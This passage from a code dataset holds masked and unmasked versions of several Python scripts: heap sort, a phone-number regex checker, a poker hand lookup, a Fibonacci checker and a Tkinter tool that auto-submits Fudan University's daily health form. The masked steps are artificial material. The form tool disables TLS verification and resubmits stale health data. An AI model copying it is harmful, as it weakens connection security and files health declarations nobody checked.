"step-2": "<mask token>\n\n\ndef max_heapity(arr, start, end):\n root = start\n while True:\n child = 2 * root + 1\n if child > end:\n break\n if child + 1 <= end and arr[child] < arr[child + 1]:\n child += 1\n if arr[root] < arr[child]:\n arr[root], arr[child] = arr[child], arr[root]\n root = child\n else:\n break\n\n\ndef build_max_heap(arr):\n n = len(arr)\n for start in range(n // 2 - 1, -1, -1):\n max_heapity(arr, start, n - 1)\n\n\ndef heap_sort(arr):\n build_max_heap(arr)\n print('Max Heap:', arr)\n n = len(arr)\n for i in range(n - 1, 0, -1):\n arr[0], arr[i] = arr[i], arr[0]\n max_heapity(arr, 0, i - 1)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef max_heapity(arr, start, end):\n root = start\n while True:\n child = 2 * root + 1\n if child > end:\n break\n if child + 1 <= end and arr[child] < arr[child + 1]:\n child += 1\n if arr[root] < arr[child]:\n arr[root], arr[child] = arr[child], arr[root]\n root = child\n else:\n break\n\n\ndef build_max_heap(arr):\n n = len(arr)\n for start in range(n // 2 - 1, -1, -1):\n max_heapity(arr, start, n - 1)\n\n\ndef heap_sort(arr):\n build_max_heap(arr)\n print('Max Heap:', arr)\n n = len(arr)\n for i in range(n - 1, 0, -1):\n arr[0], arr[i] = arr[i], arr[0]\n max_heapity(arr, 0, i - 1)\n\n\nif __name__ == '__main__':\n data = [38, 14, 57, 59, 52, 19]\n print('Original:', data)\n heap_sort(data)\n print('Sorted:', data)\n print()\n data = [9, 15, 12, 23, 33, 26, 7, 31, 42, 36]\n print('original:', data)\n heap_sort(data)\n print('Sorted:', data)\n",
"step-4": "import math\n\n\ndef max_heapity(arr, start, end):\n root = start\n while True:\n child = 2 * root + 1\n if child > end:\n break\n if child + 1 <= end and arr[child] < arr[child + 1]:\n child += 1\n if arr[root] < arr[child]:\n arr[root], arr[child] = arr[child], arr[root]\n root = child\n else:\n break\n\n\ndef build_max_heap(arr):\n n = len(arr)\n for start in range(n // 2 - 1, -1, -1):\n max_heapity(arr, start, n - 1)\n\n\ndef heap_sort(arr):\n build_max_heap(arr)\n print('Max Heap:', arr)\n n = len(arr)\n for i in range(n - 1, 0, -1):\n arr[0], arr[i] = arr[i], arr[0]\n max_heapity(arr, 0, i - 1)\n\n\nif __name__ == '__main__':\n data = [38, 14, 57, 59, 52, 19]\n print('Original:', data)\n heap_sort(data)\n print('Sorted:', data)\n print()\n data = [9, 15, 12, 23, 33, 26, 7, 31, 42, 36]\n print('original:', data)\n heap_sort(data)\n print('Sorted:', data)\n",
"step-5": "import math\n\n\ndef max_heapity(arr, start, end):\n root = start\n while True:\n child = 2 * root + 1\n # 若子節點指標超出範圍則結束\n if child > end:\n break\n\n # 先比較左右兩個子節點大小,選擇最大的那個子節點\n if child + 1 <= end and arr[child] < arr[child + 1]:\n child += 1\n\n # 如果 root 的值小於 child 最大值,則交換 (符合 max-heap 的特性)\n if arr[root] < arr[child]:\n arr[root], arr[child] = arr[child], arr[root]\n root = child\n else:\n break\n\n\ndef build_max_heap(arr):\n n = len(arr)\n for start in range(n // 2 - 1, -1, -1):\n max_heapity(arr, start, n-1)\n\n\ndef heap_sort(arr):\n # 首先將資料轉換為 heap 資料結構\n build_max_heap(arr)\n print(\"Max Heap:\", arr)\n\n # 我們將第一個元素(root)和已經排好的元素前一位(unsorted part)做交換\n # 再重新調整 unsorted part 使其符合 max-heap 特性\n # 直到排序完畢。\n n = len(arr)\n for i in range(n - 1, 0, -1):\n arr[0], arr[i] = arr[i], arr[0]\n max_heapity(arr, 0, i-1)\n\n\nif __name__ == \"__main__\":\n data = [38, 14, 57, 59, 52, 19]\n print(\"Original:\", data)\n heap_sort(data) # heap: [59, 52, 57, 14, 38, 19]\n print(\"Sorted:\", data) # [14, 19, 38, 52, 57, 59]\n\n print()\n data = [9, 15, 12, 23, 33, 26, 7, 31, 42, 36]\n print(\"original:\", data)\n heap_sort(data) # [42, 36, 26, 31, 33, 12, 7, 15, 23, 9]\n print(\"Sorted:\", data) # [7, 9, 12, 15, 23, 26, 31, 33, 36, 42]\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
import re
n = input("電話番号を入力してください>>")
pattern = r'[\(]{0,1}[0-9]{2,4}[\)\-\(]{0,1}[0-9]{2,4}[\)\-]{0,1}[0-9]{3,4}'
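# Note: re.findall also reports a match when a phone-number-like substring appears anywhere
# in the input; re.fullmatch(pattern, n) would validate the entire string strictly.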
if re.findall(pattern, n):
print(n, "は電話番号の形式です")
else:
print(n, "は電話番号の形式ではありません")
|
normal
|
{
"blob_id": "7ea81f83f556fcc55c9c9d44bcd63c583829fc08",
"index": 8977,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif re.findall(pattern, n):\n print(n, 'は電話番号の形式です')\nelse:\n print(n, 'は電話番号の形式ではありません')\n",
"step-3": "<mask token>\nn = input('電話番号を入力してください>>')\npattern = (\n '[\\\\(]{0,1}[0-9]{2,4}[\\\\)\\\\-\\\\(]{0,1}[0-9]{2,4}[\\\\)\\\\-]{0,1}[0-9]{3,4}')\nif re.findall(pattern, n):\n print(n, 'は電話番号の形式です')\nelse:\n print(n, 'は電話番号の形式ではありません')\n",
"step-4": "import re\nn = input('電話番号を入力してください>>')\npattern = (\n '[\\\\(]{0,1}[0-9]{2,4}[\\\\)\\\\-\\\\(]{0,1}[0-9]{2,4}[\\\\)\\\\-]{0,1}[0-9]{3,4}')\nif re.findall(pattern, n):\n print(n, 'は電話番号の形式です')\nelse:\n print(n, 'は電話番号の形式ではありません')\n",
"step-5": "import re\n\nn = input(\"電話番号を入力してください>>\")\npattern = r'[\\(]{0,1}[0-9]{2,4}[\\)\\-\\(]{0,1}[0-9]{2,4}[\\)\\-]{0,1}[0-9]{3,4}'\nif re.findall(pattern, n):\n print(n, \"は電話番号の形式です\")\nelse:\n print(n, \"は電話番号の形式ではありません\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from deuces.card import Card
from deuces.deck import Deck
from fast_utils.hand_strength.original_HS import *
from fast_utils.hand_strength.nn_HS import encode_hs
from fast_utils.expected_hand_strength.nn_EHS import *
from keras.models import load_model
def read_lookup_table(hole_cards, lookup_table):
"""
Reads the preflop lookup table preflop_EHSs.txt.
Args:
hole_cards: list of int (deuces cards)
lookup_table: read from preflop_EHSs.txt
Return:
tuple (float, float): EHS, EHS^2
"""
sorted_hole = sorted(hole_cards)
sorted_hole.reverse()
card_strings = [Card.int_to_str(card) for card in sorted_hole]
if card_strings[0][1] != card_strings[1][1]:
suited = False
else:
suited = True
card_strings[0] = card_strings[0][0] + 'd'
if suited:
card_strings[1] = card_strings[1][0] + 'd'
else:
card_strings[1] = card_strings[1][0] + 's'
card_strings = tuple(card_strings)
return lookup_table[card_strings]
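# Example usage (hypothetical; assumes `lookup_table` maps ('Ad', 'Kd')-style tuples to
# (EHS, EHS^2) pairs parsed from preflop_EHSs.txt):
# hole = [Card.new('Ah'), Card.new('Kh')]
# ehs, ehs_sq = read_lookup_table(hole, lookup_table)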
|
normal
|
{
"blob_id": "8503998fc881f47dc695d3ea4c7f56fa65a96e8a",
"index": 2874,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef read_lookup_table(hole_cards, lookup_table):\n \"\"\"\n Reads the preflop lookup table preflop_EHSs.txt.\n Args: \n hole_cards: list of int (deuces cards)\n lookup_table: read from preflop_EHSs.txt\n Return:\n tuple (float, float): EHS, EHS^2\n \"\"\"\n sorted_hole = sorted(hole_cards)\n sorted_hole.reverse()\n card_strings = [Card.int_to_str(card) for card in sorted_hole]\n if card_strings[0][1] != card_strings[1][1]:\n suited = False\n else:\n suited = True\n card_strings[0] = card_strings[0][0] + 'd'\n if suited:\n card_strings[1] = card_strings[1][0] + 'd'\n else:\n card_strings[1] = card_strings[1][0] + 's'\n card_strings = tuple(card_strings)\n return lookup_table[card_strings]\n",
"step-3": "from deuces.card import Card\nfrom deuces.deck import Deck\nfrom fast_utils.hand_strength.original_HS import *\nfrom fast_utils.hand_strength.nn_HS import encode_hs\nfrom fast_utils.expected_hand_strength.nn_EHS import *\nfrom keras.models import load_model\n\n\ndef read_lookup_table(hole_cards, lookup_table):\n \"\"\"\n Reads the preflop lookup table preflop_EHSs.txt.\n Args: \n hole_cards: list of int (deuces cards)\n lookup_table: read from preflop_EHSs.txt\n Return:\n tuple (float, float): EHS, EHS^2\n \"\"\"\n sorted_hole = sorted(hole_cards)\n sorted_hole.reverse()\n card_strings = [Card.int_to_str(card) for card in sorted_hole]\n if card_strings[0][1] != card_strings[1][1]:\n suited = False\n else:\n suited = True\n card_strings[0] = card_strings[0][0] + 'd'\n if suited:\n card_strings[1] = card_strings[1][0] + 'd'\n else:\n card_strings[1] = card_strings[1][0] + 's'\n card_strings = tuple(card_strings)\n return lookup_table[card_strings]\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
# Umut Cakan Computer Science S006742
# Fibonacci list. First and second terms are static.
fib_list = [0, 1]
# Current index.
CURRENT_INDEX = 2
# Function for checking whether the input is a Fibonacci number.
def check_fibonacci_number():
global CURRENT_INDEX
    # Generate Fibonacci numbers up to (and including) the input value;
    # numbers beyond the input can never match, so we stop there.
while fib_list[CURRENT_INDEX - 1] < NUMBER_TO_BE_CHECKED:
fib_list.append(fib_list[CURRENT_INDEX - 1] + fib_list[CURRENT_INDEX - 2])
CURRENT_INDEX += 1
# Check if the input value is in that list or not.
if NUMBER_TO_BE_CHECKED not in fib_list:
print("Your number is not a Fibonacci number.")
else:
print("Your number is a Fibonacci number.")
# Get number to be checked from user.
while True:
try:
NUMBER_TO_BE_CHECKED = int(input("Please enter the number to check: "))
    # If it is not an integer, print an error message and ask for another input.
except ValueError:
print("Your input is not an integer!")
continue
# If it is an integer, proceed.
else:
check_fibonacci_number()
break
|
normal
|
{
"blob_id": "50fa8852f74f4d2428fb238a86dd1feedb210877",
"index": 3261,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef check_fibonacci_number():\n global CURRENT_INDEX\n while fib_list[CURRENT_INDEX - 1] < NUMBER_TO_BE_CHECKED:\n fib_list.append(fib_list[CURRENT_INDEX - 1] + fib_list[\n CURRENT_INDEX - 2])\n CURRENT_INDEX += 1\n if NUMBER_TO_BE_CHECKED not in fib_list:\n print('Your number is not a Fibonacci number.')\n else:\n print('Your number is a Fibonacci number.')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef check_fibonacci_number():\n global CURRENT_INDEX\n while fib_list[CURRENT_INDEX - 1] < NUMBER_TO_BE_CHECKED:\n fib_list.append(fib_list[CURRENT_INDEX - 1] + fib_list[\n CURRENT_INDEX - 2])\n CURRENT_INDEX += 1\n if NUMBER_TO_BE_CHECKED not in fib_list:\n print('Your number is not a Fibonacci number.')\n else:\n print('Your number is a Fibonacci number.')\n\n\nwhile True:\n try:\n NUMBER_TO_BE_CHECKED = int(input('Please enter the number to check: '))\n except ValueError:\n print('Your input is not an integer!')\n continue\n else:\n check_fibonacci_number()\n break\n",
"step-4": "fib_list = [0, 1]\nCURRENT_INDEX = 2\n\n\ndef check_fibonacci_number():\n global CURRENT_INDEX\n while fib_list[CURRENT_INDEX - 1] < NUMBER_TO_BE_CHECKED:\n fib_list.append(fib_list[CURRENT_INDEX - 1] + fib_list[\n CURRENT_INDEX - 2])\n CURRENT_INDEX += 1\n if NUMBER_TO_BE_CHECKED not in fib_list:\n print('Your number is not a Fibonacci number.')\n else:\n print('Your number is a Fibonacci number.')\n\n\nwhile True:\n try:\n NUMBER_TO_BE_CHECKED = int(input('Please enter the number to check: '))\n except ValueError:\n print('Your input is not an integer!')\n continue\n else:\n check_fibonacci_number()\n break\n",
"step-5": "# Umut Cakan Computer Science S006742\n\n# Fibonacci list. First and second terms are static.\nfib_list = [0, 1]\n# Current index.\nCURRENT_INDEX = 2\n\n# Function for the checking input is a Fibonacci number or not.\ndef check_fibonacci_number():\n global CURRENT_INDEX\n # Get the fibonacci numbers that are less or equal to input value.\n # Because we will not need to check fib numbers that are higher than our input.\n while fib_list[CURRENT_INDEX - 1] < NUMBER_TO_BE_CHECKED:\n fib_list.append(fib_list[CURRENT_INDEX - 1] + fib_list[CURRENT_INDEX - 2])\n CURRENT_INDEX += 1\n # Check if the input value is in that list or not.\n if NUMBER_TO_BE_CHECKED not in fib_list:\n print(\"Your number is not a Fibonacci number.\")\n else:\n print(\"Your number is a Fibonacci number.\")\n\n\n# Get number to be checked from user.\nwhile True:\n try:\n NUMBER_TO_BE_CHECKED = int(input(\"Please enter the number to check: \"))\n # If it is not an integer throw an error and wait for another input.\n except ValueError:\n print(\"Your input is not an integer!\")\n continue\n # If it is an integer, proceed. \n else:\n check_fibonacci_number()\n break\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python
# ! -*- coding: utf-8 -*-
'''
@Time : 2020/6/4 16:33
@Author : MaohuaYang
@Contact : [email protected]
@File : pinganFudan-GUI.py
@Software: PyCharm
'''
import time
import requests
import tkinter as tk
from login import Ehall
def set_win_center(root, curWidth='', curHight=''):
"""
设置窗口大小,并居中显示
:param root:主窗体实例
:param curWidth:窗口宽度,非必填,默认200
:param curHight:窗口高度,非必填,默认200
:return:无
"""
if not curWidth:
        '''Get the window width, default 200'''
curWidth = root.winfo_width()
if not curHight:
        '''Get the window height, default 200'''
curHight = root.winfo_height()
# print(curWidth, curHight)
    # Get the screen width and height
scn_w, scn_h = root.maxsize()
# print(scn_w, scn_h)
    # Compute the centered top-left coordinates
cen_x = (scn_w - curWidth) / 2
cen_y = (scn_h - curHight) / 2
# print(cen_x, cen_y)
    # Set the initial window size and position
size_xy = '%dx%d+%d+%d' % (curWidth, curHight, cen_x, cen_y)
root.geometry(size_xy)
def sign_up(ehall, address_info):
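    # Fetch the previously saved daily form, merge in today's address info, and POST it back
    # to the save endpoint.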
url = 'https://zlapp.fudan.edu.cn/ncov/wap/fudan/get-info'
response = ehall.session.get(url, headers=ehall.headers, verify=False)
data = response.json()
url = 'https://zlapp.fudan.edu.cn/ncov/wap/fudan/save'
data['d']['info'].update(address_info)
post_data = data['d']['info']
response = ehall.session.post(url, data=post_data, verify=False, headers=ehall.headers)
return response.json()
def main():
root = tk.Tk()
root.title("DailyFudan")
set_win_center(root, 700, 350)
root.resizable(0, 0)
# user ID
lblid = tk.Label(root, text="学号:")
lblid.grid(row=0, column=0)
#lid.pack()
entID = tk.Entry(root)
entID.grid(row=0, column=1, padx=25, pady=0)
#entID.pack()
# password
lblPW = tk.Label(root, text="Ehall密码:")
lblPW.grid(row=1, column=0)
#lPW.pack()
entPW = tk.Entry(root, show="*")
entPW.grid(row=1, column=1)
#entPW.pack()
# location information
lblArea = tk.Label(root, text='区域:')
lblArea.grid(row=2, column=0)
varArea = tk.StringVar(value="上海市 杨浦区")
entArea = tk.Entry(root, textvariable=varArea, width=20)
entArea.grid(row=2, column=1)
#entArea.pack()
lblProv = tk.Label(root, text='省份:')
lblProv.grid(row=3, column=0)
varProv = tk.StringVar(value="上海")
entProv = tk.Entry(root, textvariable=varProv, width=20)
entProv.grid(row=3, column=1)
#entProv.pack()
lblCity = tk.Label(root, text='城市:')
lblCity.grid(row=4, column=0)
varCity = tk.StringVar(value="上海市")
entCity = tk.Entry(root, textvariable=varCity, width=20)
entCity.grid(row=4, column=1)
#entCity.pack()
# auto submit
    # to be continued
# log area
scroll = tk.Scrollbar()
textlog = tk.Text(root, state=tk.DISABLED, width=50, bg='lightgray')
textlog.grid(row=0, rowspan=6, column=2, sticky=tk.S+tk.W+tk.E+tk.N)
scroll.grid(row=0, rowspan=6, column=3, sticky=tk.S + tk.W + tk.E + tk.N, ipadx=0)
scroll.config(command=textlog.yview)
textlog.config(yscrollcommand=scroll.set)
def submit_btn_cmd():
id = entID.get().strip()
pw = entPW.get().strip()
config = {
'id': id,
'pw': pw
}
ehall = Ehall(config)
ehall.login()
if ehall.username:
address_info = {
"area": varArea.get(),
"province": varProv.get(),
"city": varCity.get()
}
data = sign_up(ehall, address_info)
print(data)
if data['e'] == 0:
log = ">>填报成功!%s %s\n" % (ehall.username, time.ctime())
else:
log = ">>今日已填报!%s %s\n" % (ehall.username, time.ctime())
else:
log = ">>登录失败!%s %s\n" % (ehall.username, time.ctime())
textlog.config(state=tk.NORMAL)
textlog.insert("insert", log)
textlog.config(state=tk.DISABLED)
btuExit = tk.Button(root, text='退出', command=root.quit, width=10)
btuExit.grid(row=5, column=1, pady=2)
btuSub = tk.Button(root, text="提交", command=submit_btn_cmd, width=10)
btuSub.grid(row=5, column=0, pady=2, padx=20)
root.mainloop()
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "d133a07f69d2dadb5559d881b01050abb2a9602b",
"index": 3891,
"step-1": "<mask token>\n\n\ndef main():\n root = tk.Tk()\n root.title('DailyFudan')\n set_win_center(root, 700, 350)\n root.resizable(0, 0)\n lblid = tk.Label(root, text='学号:')\n lblid.grid(row=0, column=0)\n entID = tk.Entry(root)\n entID.grid(row=0, column=1, padx=25, pady=0)\n lblPW = tk.Label(root, text='Ehall密码:')\n lblPW.grid(row=1, column=0)\n entPW = tk.Entry(root, show='*')\n entPW.grid(row=1, column=1)\n lblArea = tk.Label(root, text='区域:')\n lblArea.grid(row=2, column=0)\n varArea = tk.StringVar(value='上海市 杨浦区')\n entArea = tk.Entry(root, textvariable=varArea, width=20)\n entArea.grid(row=2, column=1)\n lblProv = tk.Label(root, text='省份:')\n lblProv.grid(row=3, column=0)\n varProv = tk.StringVar(value='上海')\n entProv = tk.Entry(root, textvariable=varProv, width=20)\n entProv.grid(row=3, column=1)\n lblCity = tk.Label(root, text='城市:')\n lblCity.grid(row=4, column=0)\n varCity = tk.StringVar(value='上海市')\n entCity = tk.Entry(root, textvariable=varCity, width=20)\n entCity.grid(row=4, column=1)\n scroll = tk.Scrollbar()\n textlog = tk.Text(root, state=tk.DISABLED, width=50, bg='lightgray')\n textlog.grid(row=0, rowspan=6, column=2, sticky=tk.S + tk.W + tk.E + tk.N)\n scroll.grid(row=0, rowspan=6, column=3, sticky=tk.S + tk.W + tk.E + tk.\n N, ipadx=0)\n scroll.config(command=textlog.yview)\n textlog.config(yscrollcommand=scroll.set)\n\n def submit_btn_cmd():\n id = entID.get().strip()\n pw = entPW.get().strip()\n config = {'id': id, 'pw': pw}\n ehall = Ehall(config)\n ehall.login()\n if ehall.username:\n address_info = {'area': varArea.get(), 'province': varProv.get(\n ), 'city': varCity.get()}\n data = sign_up(ehall, address_info)\n print(data)\n if data['e'] == 0:\n log = '>>填报成功!%s %s\\n' % (ehall.username, time.ctime())\n else:\n log = '>>今日已填报!%s %s\\n' % (ehall.username, time.ctime())\n else:\n log = '>>登录失败!%s %s\\n' % (ehall.username, time.ctime())\n textlog.config(state=tk.NORMAL)\n textlog.insert('insert', log)\n textlog.config(state=tk.DISABLED)\n btuExit = tk.Button(root, text='退出', command=root.quit, width=10)\n btuExit.grid(row=5, column=1, pady=2)\n btuSub = tk.Button(root, text='提交', command=submit_btn_cmd, width=10)\n btuSub.grid(row=5, column=0, pady=2, padx=20)\n root.mainloop()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef set_win_center(root, curWidth='', curHight=''):\n \"\"\"\n 设置窗口大小,并居中显示\n :param root:主窗体实例\n :param curWidth:窗口宽度,非必填,默认200\n :param curHight:窗口高度,非必填,默认200\n :return:无\n \"\"\"\n if not curWidth:\n \"\"\"获取窗口宽度,默认200\"\"\"\n curWidth = root.winfo_width()\n if not curHight:\n \"\"\"获取窗口高度,默认200\"\"\"\n curHight = root.winfo_height()\n scn_w, scn_h = root.maxsize()\n cen_x = (scn_w - curWidth) / 2\n cen_y = (scn_h - curHight) / 2\n size_xy = '%dx%d+%d+%d' % (curWidth, curHight, cen_x, cen_y)\n root.geometry(size_xy)\n\n\ndef sign_up(ehall, address_info):\n url = 'https://zlapp.fudan.edu.cn/ncov/wap/fudan/get-info'\n response = ehall.session.get(url, headers=ehall.headers, verify=False)\n data = response.json()\n url = 'https://zlapp.fudan.edu.cn/ncov/wap/fudan/save'\n data['d']['info'].update(address_info)\n post_data = data['d']['info']\n response = ehall.session.post(url, data=post_data, verify=False,\n headers=ehall.headers)\n return response.json()\n\n\ndef main():\n root = tk.Tk()\n root.title('DailyFudan')\n set_win_center(root, 700, 350)\n root.resizable(0, 0)\n lblid = tk.Label(root, text='学号:')\n lblid.grid(row=0, column=0)\n entID = tk.Entry(root)\n entID.grid(row=0, column=1, padx=25, pady=0)\n lblPW = tk.Label(root, text='Ehall密码:')\n lblPW.grid(row=1, column=0)\n entPW = tk.Entry(root, show='*')\n entPW.grid(row=1, column=1)\n lblArea = tk.Label(root, text='区域:')\n lblArea.grid(row=2, column=0)\n varArea = tk.StringVar(value='上海市 杨浦区')\n entArea = tk.Entry(root, textvariable=varArea, width=20)\n entArea.grid(row=2, column=1)\n lblProv = tk.Label(root, text='省份:')\n lblProv.grid(row=3, column=0)\n varProv = tk.StringVar(value='上海')\n entProv = tk.Entry(root, textvariable=varProv, width=20)\n entProv.grid(row=3, column=1)\n lblCity = tk.Label(root, text='城市:')\n lblCity.grid(row=4, column=0)\n varCity = tk.StringVar(value='上海市')\n entCity = tk.Entry(root, textvariable=varCity, width=20)\n entCity.grid(row=4, column=1)\n scroll = tk.Scrollbar()\n textlog = tk.Text(root, state=tk.DISABLED, width=50, bg='lightgray')\n textlog.grid(row=0, rowspan=6, column=2, sticky=tk.S + tk.W + tk.E + tk.N)\n scroll.grid(row=0, rowspan=6, column=3, sticky=tk.S + tk.W + tk.E + tk.\n N, ipadx=0)\n scroll.config(command=textlog.yview)\n textlog.config(yscrollcommand=scroll.set)\n\n def submit_btn_cmd():\n id = entID.get().strip()\n pw = entPW.get().strip()\n config = {'id': id, 'pw': pw}\n ehall = Ehall(config)\n ehall.login()\n if ehall.username:\n address_info = {'area': varArea.get(), 'province': varProv.get(\n ), 'city': varCity.get()}\n data = sign_up(ehall, address_info)\n print(data)\n if data['e'] == 0:\n log = '>>填报成功!%s %s\\n' % (ehall.username, time.ctime())\n else:\n log = '>>今日已填报!%s %s\\n' % (ehall.username, time.ctime())\n else:\n log = '>>登录失败!%s %s\\n' % (ehall.username, time.ctime())\n textlog.config(state=tk.NORMAL)\n textlog.insert('insert', log)\n textlog.config(state=tk.DISABLED)\n btuExit = tk.Button(root, text='退出', command=root.quit, width=10)\n btuExit.grid(row=5, column=1, pady=2)\n btuSub = tk.Button(root, text='提交', command=submit_btn_cmd, width=10)\n btuSub.grid(row=5, column=0, pady=2, padx=20)\n root.mainloop()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef set_win_center(root, curWidth='', curHight=''):\n \"\"\"\n 设置窗口大小,并居中显示\n :param root:主窗体实例\n :param curWidth:窗口宽度,非必填,默认200\n :param curHight:窗口高度,非必填,默认200\n :return:无\n \"\"\"\n if not curWidth:\n \"\"\"获取窗口宽度,默认200\"\"\"\n curWidth = root.winfo_width()\n if not curHight:\n \"\"\"获取窗口高度,默认200\"\"\"\n curHight = root.winfo_height()\n scn_w, scn_h = root.maxsize()\n cen_x = (scn_w - curWidth) / 2\n cen_y = (scn_h - curHight) / 2\n size_xy = '%dx%d+%d+%d' % (curWidth, curHight, cen_x, cen_y)\n root.geometry(size_xy)\n\n\ndef sign_up(ehall, address_info):\n url = 'https://zlapp.fudan.edu.cn/ncov/wap/fudan/get-info'\n response = ehall.session.get(url, headers=ehall.headers, verify=False)\n data = response.json()\n url = 'https://zlapp.fudan.edu.cn/ncov/wap/fudan/save'\n data['d']['info'].update(address_info)\n post_data = data['d']['info']\n response = ehall.session.post(url, data=post_data, verify=False,\n headers=ehall.headers)\n return response.json()\n\n\ndef main():\n root = tk.Tk()\n root.title('DailyFudan')\n set_win_center(root, 700, 350)\n root.resizable(0, 0)\n lblid = tk.Label(root, text='学号:')\n lblid.grid(row=0, column=0)\n entID = tk.Entry(root)\n entID.grid(row=0, column=1, padx=25, pady=0)\n lblPW = tk.Label(root, text='Ehall密码:')\n lblPW.grid(row=1, column=0)\n entPW = tk.Entry(root, show='*')\n entPW.grid(row=1, column=1)\n lblArea = tk.Label(root, text='区域:')\n lblArea.grid(row=2, column=0)\n varArea = tk.StringVar(value='上海市 杨浦区')\n entArea = tk.Entry(root, textvariable=varArea, width=20)\n entArea.grid(row=2, column=1)\n lblProv = tk.Label(root, text='省份:')\n lblProv.grid(row=3, column=0)\n varProv = tk.StringVar(value='上海')\n entProv = tk.Entry(root, textvariable=varProv, width=20)\n entProv.grid(row=3, column=1)\n lblCity = tk.Label(root, text='城市:')\n lblCity.grid(row=4, column=0)\n varCity = tk.StringVar(value='上海市')\n entCity = tk.Entry(root, textvariable=varCity, width=20)\n entCity.grid(row=4, column=1)\n scroll = tk.Scrollbar()\n textlog = tk.Text(root, state=tk.DISABLED, width=50, bg='lightgray')\n textlog.grid(row=0, rowspan=6, column=2, sticky=tk.S + tk.W + tk.E + tk.N)\n scroll.grid(row=0, rowspan=6, column=3, sticky=tk.S + tk.W + tk.E + tk.\n N, ipadx=0)\n scroll.config(command=textlog.yview)\n textlog.config(yscrollcommand=scroll.set)\n\n def submit_btn_cmd():\n id = entID.get().strip()\n pw = entPW.get().strip()\n config = {'id': id, 'pw': pw}\n ehall = Ehall(config)\n ehall.login()\n if ehall.username:\n address_info = {'area': varArea.get(), 'province': varProv.get(\n ), 'city': varCity.get()}\n data = sign_up(ehall, address_info)\n print(data)\n if data['e'] == 0:\n log = '>>填报成功!%s %s\\n' % (ehall.username, time.ctime())\n else:\n log = '>>今日已填报!%s %s\\n' % (ehall.username, time.ctime())\n else:\n log = '>>登录失败!%s %s\\n' % (ehall.username, time.ctime())\n textlog.config(state=tk.NORMAL)\n textlog.insert('insert', log)\n textlog.config(state=tk.DISABLED)\n btuExit = tk.Button(root, text='退出', command=root.quit, width=10)\n btuExit.grid(row=5, column=1, pady=2)\n btuSub = tk.Button(root, text='提交', command=submit_btn_cmd, width=10)\n btuSub.grid(row=5, column=0, pady=2, padx=20)\n root.mainloop()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nimport time\nimport requests\nimport tkinter as tk\nfrom login import Ehall\n\n\ndef set_win_center(root, curWidth='', curHight=''):\n \"\"\"\n 设置窗口大小,并居中显示\n :param root:主窗体实例\n :param curWidth:窗口宽度,非必填,默认200\n :param curHight:窗口高度,非必填,默认200\n :return:无\n \"\"\"\n if not curWidth:\n \"\"\"获取窗口宽度,默认200\"\"\"\n curWidth = root.winfo_width()\n if not curHight:\n \"\"\"获取窗口高度,默认200\"\"\"\n curHight = root.winfo_height()\n scn_w, scn_h = root.maxsize()\n cen_x = (scn_w - curWidth) / 2\n cen_y = (scn_h - curHight) / 2\n size_xy = '%dx%d+%d+%d' % (curWidth, curHight, cen_x, cen_y)\n root.geometry(size_xy)\n\n\ndef sign_up(ehall, address_info):\n url = 'https://zlapp.fudan.edu.cn/ncov/wap/fudan/get-info'\n response = ehall.session.get(url, headers=ehall.headers, verify=False)\n data = response.json()\n url = 'https://zlapp.fudan.edu.cn/ncov/wap/fudan/save'\n data['d']['info'].update(address_info)\n post_data = data['d']['info']\n response = ehall.session.post(url, data=post_data, verify=False,\n headers=ehall.headers)\n return response.json()\n\n\ndef main():\n root = tk.Tk()\n root.title('DailyFudan')\n set_win_center(root, 700, 350)\n root.resizable(0, 0)\n lblid = tk.Label(root, text='学号:')\n lblid.grid(row=0, column=0)\n entID = tk.Entry(root)\n entID.grid(row=0, column=1, padx=25, pady=0)\n lblPW = tk.Label(root, text='Ehall密码:')\n lblPW.grid(row=1, column=0)\n entPW = tk.Entry(root, show='*')\n entPW.grid(row=1, column=1)\n lblArea = tk.Label(root, text='区域:')\n lblArea.grid(row=2, column=0)\n varArea = tk.StringVar(value='上海市 杨浦区')\n entArea = tk.Entry(root, textvariable=varArea, width=20)\n entArea.grid(row=2, column=1)\n lblProv = tk.Label(root, text='省份:')\n lblProv.grid(row=3, column=0)\n varProv = tk.StringVar(value='上海')\n entProv = tk.Entry(root, textvariable=varProv, width=20)\n entProv.grid(row=3, column=1)\n lblCity = tk.Label(root, text='城市:')\n lblCity.grid(row=4, column=0)\n varCity = tk.StringVar(value='上海市')\n entCity = tk.Entry(root, textvariable=varCity, width=20)\n entCity.grid(row=4, column=1)\n scroll = tk.Scrollbar()\n textlog = tk.Text(root, state=tk.DISABLED, width=50, bg='lightgray')\n textlog.grid(row=0, rowspan=6, column=2, sticky=tk.S + tk.W + tk.E + tk.N)\n scroll.grid(row=0, rowspan=6, column=3, sticky=tk.S + tk.W + tk.E + tk.\n N, ipadx=0)\n scroll.config(command=textlog.yview)\n textlog.config(yscrollcommand=scroll.set)\n\n def submit_btn_cmd():\n id = entID.get().strip()\n pw = entPW.get().strip()\n config = {'id': id, 'pw': pw}\n ehall = Ehall(config)\n ehall.login()\n if ehall.username:\n address_info = {'area': varArea.get(), 'province': varProv.get(\n ), 'city': varCity.get()}\n data = sign_up(ehall, address_info)\n print(data)\n if data['e'] == 0:\n log = '>>填报成功!%s %s\\n' % (ehall.username, time.ctime())\n else:\n log = '>>今日已填报!%s %s\\n' % (ehall.username, time.ctime())\n else:\n log = '>>登录失败!%s %s\\n' % (ehall.username, time.ctime())\n textlog.config(state=tk.NORMAL)\n textlog.insert('insert', log)\n textlog.config(state=tk.DISABLED)\n btuExit = tk.Button(root, text='退出', command=root.quit, width=10)\n btuExit.grid(row=5, column=1, pady=2)\n btuSub = tk.Button(root, text='提交', command=submit_btn_cmd, width=10)\n btuSub.grid(row=5, column=0, pady=2, padx=20)\n 